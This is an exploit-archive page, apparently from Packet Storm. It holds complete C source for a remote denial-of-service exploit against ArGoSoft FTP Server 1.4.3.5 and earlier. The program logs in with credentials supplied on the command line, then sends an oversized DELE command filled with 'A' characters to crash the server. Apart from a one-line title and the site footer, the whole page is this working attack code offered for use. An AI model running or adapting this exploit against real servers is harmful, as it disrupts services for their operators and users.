ArGoSoft FTP server versions 1.4.3.5 and below remote denial of service exploit.
37840dc5e7614f6dacb3b057a5b527ff414a8f2e14adad675f4f68481ade620c/*
Name: ArGoSoft FTP Server <= 1.4.3.5 Exploit
Target: DoS
Author: Lympex
Date: 26/02/2006
Contact:
+ lympex[at]gmail[dot]com
+ http://L-Bytes.Tk
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <winsock2.h>
void Banner()
{
printf("\n[+] ArGoSoft FTP Server <= 1.4.3.5 - DoS Exploit");
printf("\n[+] Coded by Lympex:");
printf("\n + Lympex[at]Gmail[dot]Com");
printf("\n + http://L-Bytes.Tk");
printf("\n================================================\n");
return;
}
int main(int argc, char *argv[])
{
//data
unsigned int MAX_SIZE=1024;
char *Buf,Buffer[MAX_SIZE];
//connection
const unsigned int Wait=1000;
WSADATA wsaData;
SOCKET Winsock;
struct sockaddr_in Winsock_In;
struct hostent *Ip;
//start
Banner();
if(argc!=5)
{printf("\n[+] Usage: %s <Ftp_Server> <Ftp_Port> <Ftp_Login> <Ftp_Pass>\n",argv[0]);return -1;}
//attack
printf("\n[*] Connecting: %s:%s ...",argv[1],argv[2]);
WSAStartup(MAKEWORD(2,2), &wsaData);
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
if(Winsock==INVALID_SOCKET)
{WSACleanup();printf("Error\n");return -1;}
Ip=gethostbyname(argv[1]);
Winsock_In.sin_port=htons((short)atoi(argv[2]));
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{WSACleanup();printf("Error\n");return -1;}
printf("OK");
//check in
Buf=(char *)malloc(255*sizeof(char));
memset(Buf,0,sizeof(Buf));memset(Buffer,0,sizeof(Buffer));
printf("\n[*] Authenticating: %s:%s ...",argv[3],argv[4]);
recv(Winsock,Buffer,MAX_SIZE,0);
//user command
realloc(Buf,strlen("USER ")+strlen(argv[3])+strlen("\n"));
memset(Buf,0,sizeof(Buf));memset(Buffer,0,sizeof(Buffer));
strcpy(Buf,"USER ");strcat(Buf,argv[3]);strcat(Buf,"\n");
send(Winsock,Buf,strlen(Buf),0);
recv(Winsock,Buffer,MAX_SIZE,0);
//pass command
realloc(Buf,strlen("PASS ")+strlen(argv[4])+strlen("\n"));
memset(Buf,0,sizeof(Buf));memset(Buffer,0,sizeof(Buffer));
strcpy(Buf,"PASS ");strcat(Buf,argv[4]);strcat(Buf,"\n");
send(Winsock,Buf,strlen(Buf),0);
recv(Winsock,Buffer,MAX_SIZE,0);
//verify
if(Buffer[0]!='2'){printf("Error\n");WSACleanup();return -1;}
printf("OK");
//attack
printf("\n[*] Attacking ...");
printf("\n -Sending EvilBuffer...");
char EvilBuffer[]="DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
send(Winsock,EvilBuffer,274,0);
send(Winsock,"\n",2,0);
printf("OK");
printf("\n -Waitting...");
Sleep(Wait);
printf("OK");
WSACleanup();
printf("\n[*] Done!\n");
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed